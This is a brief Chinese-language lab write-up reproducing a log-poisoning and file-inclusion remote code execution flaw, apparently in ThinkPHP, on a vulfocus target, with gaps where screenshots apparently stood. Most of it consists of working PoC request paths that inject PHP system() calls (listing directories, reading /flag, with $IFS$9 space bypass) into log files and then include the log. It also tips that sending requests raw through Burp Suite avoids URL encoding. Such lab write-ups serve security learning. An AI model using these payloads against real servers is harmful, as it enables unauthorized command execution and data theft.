漏洞复现:
启动vulfocus。
poc
/index.php?m=--><?=phpinfo();?>
/index.php?m=--><?=system('ls ');?>
/index.php?m=--><?=system('cat$IFS$9`ls` ');?>
/index.php?m=--><?=system('ls$IFS$9/');?>
/index.php?m=--><?=system('cat$IFS$9/flag');?>
#上面先传入log文件,下面文件包含。
/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/21_08_09.log

报错

同样报错?????
错误的内容的确传入进去了,可以看到传入的内容进行了url编码。
不使用浏览器进行利用,直接打开burpsuite进行抓包,同样的方式利用成功。
注意点:一开始的包会进行url编码。

改成正常的格式发包即可。

漏洞利用成功。

/index.php?m=--><?=system('ls$IFS$9/tmp');?>